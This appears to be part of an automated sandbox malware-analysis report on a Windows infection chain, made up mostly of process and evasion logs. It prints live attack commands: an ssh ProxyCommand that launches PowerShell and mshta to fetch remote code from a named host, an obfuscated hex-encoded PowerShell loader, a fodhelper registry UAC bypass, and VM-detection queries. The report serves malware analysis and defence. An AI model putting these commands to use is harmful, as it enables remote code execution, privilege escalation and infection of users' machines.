          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\fodhelper.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\fodhelper.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\fodhelper.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\fodhelper.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\fodhelper.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\fodhelper.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\fodhelper.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\fodhelper.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\mama.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\mama.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\mama.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          barindex
          Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
          Source: C:\Windows\SysWOW64\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT SerialNumber FROM Win32_DiskDrive WHERE DeviceID=\'c:\'
          Source: C:\Windows\SysWOW64\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT SerialNumber FROM Win32_DiskDrive WHERE DeviceID=\'c:\'
          Source: C:\Windows\System32\OpenSSH\ssh.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\OpenSSH\ssh.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1492Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 808Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1307Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 459Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5896Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3766Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5580
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3994
          Source: C:\Users\user\AppData\Roaming\mama.exeWindow / User API: threadDelayed 9761
          Source: C:\Windows\System32\OpenSSH\ssh.exe TID: 7540Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\System32\OpenSSH\ssh.exe TID: 7540Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7712Thread sleep count: 1492 > 30Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7712Thread sleep count: 808 > 30Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7760Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7892Thread sleep count: 1307 > 30Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7896Thread sleep count: 459 > 30Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7912Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\System32\svchost.exe TID: 5940Thread sleep time: -30000s >= -30000sJump to behavior
          Source: C:\Windows\System32\svchost.exe TID: 5940Thread sleep time: -30000s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6368Thread sleep time: -16602069666338586s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5768Thread sleep time: -20291418481080494s >= -30000s
          Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Users\user\AppData\Roaming\mama.exeCode function: 43_2_02F7E190 FindFirstFileW,FindClose,43_2_02F7E190
          Source: C:\Users\user\AppData\Roaming\mama.exeCode function: 43_2_02F7DBC4 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,43_2_02F7DBC4
          Source: C:\Windows\System32\OpenSSH\ssh.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\OpenSSH\ssh.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
          Source: mama.exe, 0000002B.00000003.1684115103.0000000000B95000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: mshta.exe, 00000008.00000002.1636097952.00000164FD67D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1622094003.00000164FD67C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0
          Source: mshta.exe, 00000008.00000003.1615831977.00000164FD6C6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1615739932.00000164FD6FD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1636263545.00000164FD6FD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1636097952.00000164FD6C6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1624823344.00000164FD6FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.2965893996.000001A40F82B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.2967333414.000001A414E59000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: ssh.exe, 00000000.00000002.1638779709.000001EE2F568000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1602361585.00000267C97B3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: mama.exe, 0000002B.00000002.3729112937.0000000000B44000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll4uASm
          Source: C:\Users\user\AppData\Roaming\mama.exeAPI call chain: ExitProcess graph end nodegraph_43-2515
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\mama.exeCode function: 43_2_03435340 LoadLibraryA,GetProcAddress,NtQueryVirtualMemory,NtQueryVirtualMemory,43_2_03435340
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Windows\System32\OpenSSH\ssh.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell powershell -Command 'DX0ucZQ[=V?uY\Xmshta https://pravo-bashkortostan.ru/aaa.mp4DX0ucZQ[=V?uY\X'.SubString(15, 44)Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta https://pravo-bashkortostan.ru/aaa.mp4"Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://pravo-bashkortostan.ru/aaa.mp4Jump to behavior
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function KYLfE($jfvKN){return -split ($jfvKN -replace '..', '0x$& ')};$ggUL = KYLfE('653ADB09197706BFF248B833EA1F27F5D58878713451BA8F31B442364AD50B177565132C81A8CE0C04335FB368B1BEC213971455480775829F6BC6C5534155F957E2CFA508A5FE4C311E066403190FB60B4C1CBCAA36CDF33D5F614FD5F67A8C2528EBC6C4B5B8A0BCE76A43045B19C3EFD6F5EF3BA1ECB5686BD73B304C0491078B179DA1CA0AE1F3DA25490E7B58EE2FF863E346260ADACB21649FF36146554F42D087971F82489AB30989E3F0674F581C0CF80616E540BCAA41B0428AFCE3F21FEDF2F8472F6163E56EE7F1258524A03F60DB1043BAA3A075884983F2CF092375522F8988E476AF72DC3C2FC7ADC9FE0507992C92239AEC2429066EBBD2B17CD0CF69B5F864C012338D6D8DD368382C5160478C96E06E3861DF4B0A736F2572D32B9090B656B519C9EE189C51F0156B1592FEE6EA266869208339B1F4A4CD0C9D18D67D96F8EDEABC3C915510C81009138CDC34ED0E78C7B482DF473E7EB8A0B3B274003F057FF8E56D8EE713118A6B7733A69E09E35C4F1734DC2CD1DE6AC8BAF5167083E43F074961524961B7179D937805AC28E554A85FFB0FCE8FFC6971BD36500B19554E2CF2C414FD3F7D20F637C3FED2CBE4F16D815833AF6587C0445B171F727757FCB88407DA064E176D7AC09BE6F81860913C206895922FA10CFC3D057E32F3236CB84F7AE4D8C4681039F91AD409D0EE7A284E00484796BDFD0C577C1033FC2B929938AE4EBE01CA086A4EF8DF874CDFA55DE6194B2ADD9FBBDE3B65169B4CE6FC4C5D063449D421C5DF87AEB418D87EB94D8085A780CFF969515BFBEB7CDAA25C3E5DDF20FBB0A604B6DDAADCF97B9534A77F8A73360422DF52B6736926BFB5D66CED1F6F797F1B6D9ADE5E074859D887E8C3BAD2D33A412611BA85A6107B8F004E605620D5E3F4FBA15B1FF642AB09A70A27BFE4F97180E1A5489A15A3E5F7DB53356E7F7869F6731F3815B6F7E852698335FA8BAB0A12F68F66EE399CA6B7D1994FCED4BFB476066214D61A279B592BEDE9BC4173840D28016672E7995C751B825A18AD0960AFBBBA9071CC631FAD152EBE5D6DA49DB75B7BD20456369CDA6719ECA0462C83310F3F5AC28103792DEEACDFA6A31D127726B84A5A8E39A884DF8FECDA2CDEC9DC279C956D253761973C9EA36666F0C5DD4C4F3306483BF6811C7ED4F0265F0E66FF777C5BB9A9B4324C54769C9B5D706B4EC485997D1ADB50FD71564B9401E52E3A3F5CBBCCB76BED1B5CF3AF43B7E7C4C42DEA2A7F2E21992968FAA86787095556C265ABB0DB1B02F1C5C06E0B96EB6B38F98AA3878E78E92A9D5FBA55B149C8DD782681A530F1C11D94505305C1EE8EF1F25970104E28DFF99776F3628512C465DC2125A38927E4CFD827415D33DC2DE13D550C5CD8ABCD58EFF5EF4B7CDFE93710EB277C3304084BD9201E5DABDEBE54FAEF993C8A690421AB366C5CF613F7CAC0628AAD89849B65FFF1054CB508E8D107D332DE6E06598C86C6E7B2AA72A92B5D11793DA067088A83ABF915B5B690EF77973FDD05902457333BF3D9982DDC982CA6E51DE08FAEE2B7B87DC3B7D2556D18306A68F6827EB9C7A69CEA51744AC77093A6DDAFBEDE1293F9BE816EBB61F0AD6D7C6984F007AD085896B84A1791374AE2D29767FA6682B78E157C46B6B622FB0CC14FD5ACF701F64474B5D1AFBAD672C4E15EFFE1CA5FBB418A59AB3CE357C55B1CC5C02697ED0B7DC5750FF0A46291413A4591CFD4E3B029F565168AF5EE6C643BABA78A73E0E7F2E781A6F2BB5B74B6D360125440C06278E8E7AC7A76D248DB1E208518388F10A6BAB46D4C01520D56940CD56758727E9268671527569A7159B1296762DE8D769DDAF8005189ED580C0A99027D6D7C7986C91BB71BEB4CF71419813DE3CC12B2BEFEA0BD89C8803D19D50F5348E88EB7A49F42528FCF43AA90404EF92E9CD2FDJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "REG ADD HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT\Shell\Open\Command /VE /T REG_SZ /D "%TMP%\r.bat" /F && REG ADD HKEY_CURRENT_USER\Software\Classes\MS-Settings\CurVer /VE /T REG_SZ /D "ServiceHostXGRT" /F && FoDHelper.exe"Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "REG DELETE HKEY_CURRENT_USER\Software\Classes\MS-Settings /F && REG DELETE HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT /F"Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "REG ADD HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT\Shell\Open\Command /VE /T REG_SZ /D "%TMP%\r.bat" /F && REG ADD HKEY_CURRENT_USER\Software\Classes\MS-Settings\CurVer /VE /T REG_SZ /D "ServiceHostXGRT" /F && FoDHelper.exe"Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "REG DELETE HKEY_CURRENT_USER\Software\Classes\MS-Settings /F && REG DELETE HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT /F"Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT\Shell\Open\Command /VE /T REG_SZ /D "C:\Users\user\AppData\Local\Temp\r.bat" /F Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD HKEY_CURRENT_USER\Software\Classes\MS-Settings\CurVer /VE /T REG_SZ /D "ServiceHostXGRT" /F Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\fodhelper.exe FoDHelper.exeJump to behavior
          Source: C:\Windows\System32\fodhelper.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\r.bat" "Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Local\Temp\r.bat" Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -w 1 -ep Unrestricted -nopJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG DELETE HKEY_CURRENT_USER\Software\Classes\MS-Settings /F
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG DELETE HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT /F
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT\Shell\Open\Command /VE /T REG_SZ /D "C:\Users\user\AppData\Local\Temp\r.bat" /F
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD HKEY_CURRENT_USER\Software\Classes\MS-Settings\CurVer /VE /T REG_SZ /D "ServiceHostXGRT" /F
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\fodhelper.exe FoDHelper.exe
          Source: C:\Windows\System32\fodhelper.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\r.bat" "
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Local\Temp\r.bat"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\mama.exe C:\Users\user\AppData\Roaming\mama.exe
          Source: C:\Users\user\AppData\Roaming\mama.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C wmic diskdrive where "DeviceID=\'c:\'" get SerialNumber /value
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG DELETE HKEY_CURRENT_USER\Software\Classes\MS-Settings /F
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG DELETE HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT /F
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic diskdrive where "DeviceID=\'c:\'" get SerialNumber /value
          Source: unknownProcess created: C:\Windows\System32\OpenSSH\ssh.exe "c:\windows\system32\openssh\ssh.exe" -o proxycommand="powershell powershell -command 'dx0uczq[=v?uy\xmshta https://pravo-bashkortostan.ru/aaa.mp4dx0uczq[=v?uy\x'.substring(15, 44)" .
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -ep unrestricted -nop function kylfe($jfvkn){return -split ($jfvkn -replace '..', '0x$& ')};$ggul = kylfe('653adb09197706bff248b833ea1f27f5d58878713451ba8f31b442364ad50b177565132c81a8ce0c04335fb368b1bec213971455480775829f6bc6c5534155f957e2cfa508a5fe4c311e066403190fb60b4c1cbcaa36cdf33d5f614fd5f67a8c2528ebc6c4b5b8a0bce76a43045b19c3efd6f5ef3ba1ecb5686bd73b304c0491078b179da1ca0ae1f3da25490e7b58ee2ff863e346260adacb21649ff36146554f42d087971f82489ab30989e3f0674f581c0cf80616e540bcaa41b0428afce3f21fedf2f8472f6163e56ee7f1258524a03f60db1043baa3a075884983f2cf092375522f8988e476af72dc3c2fc7adc9fe0507992c92239aec2429066ebbd2b17cd0cf69b5f864c012338d6d8dd368382c5160478c96e06e3861df4b0a736f2572d32b9090b656b519c9ee189c51f0156b1592fee6ea266869208339b1f4a4cd0c9d18d67d96f8edeabc3c915510c81009138cdc34ed0e78c7b482df473e7eb8a0b3b274003f057ff8e56d8ee713118a6b7733a69e09e35c4f1734dc2cd1de6ac8baf5167083e43f074961524961b7179d937805ac28e554a85ffb0fce8ffc6971bd36500b19554e2cf2c414fd3f7d20f637c3fed2cbe4f16d815833af6587c0445b171f727757fcb88407da064e176d7ac09be6f81860913c206895922fa10cfc3d057e32f3236cb84f7ae4d8c4681039f91ad409d0ee7a284e00484796bdfd0c577c1033fc2b929938ae4ebe01ca086a4ef8df874cdfa55de6194b2add9fbbde3b65169b4ce6fc4c5d063449d421c5df87aeb418d87eb94d8085a780cff969515bfbeb7cdaa25c3e5ddf20fbb0a604b6ddaadcf97b9534a77f8a73360422df52b6736926bfb5d66ced1f6f797f1b6d9ade5e074859d887e8c3bad2d33a412611ba85a6107b8f004e605620d5e3f4fba15b1ff642ab09a70a27bfe4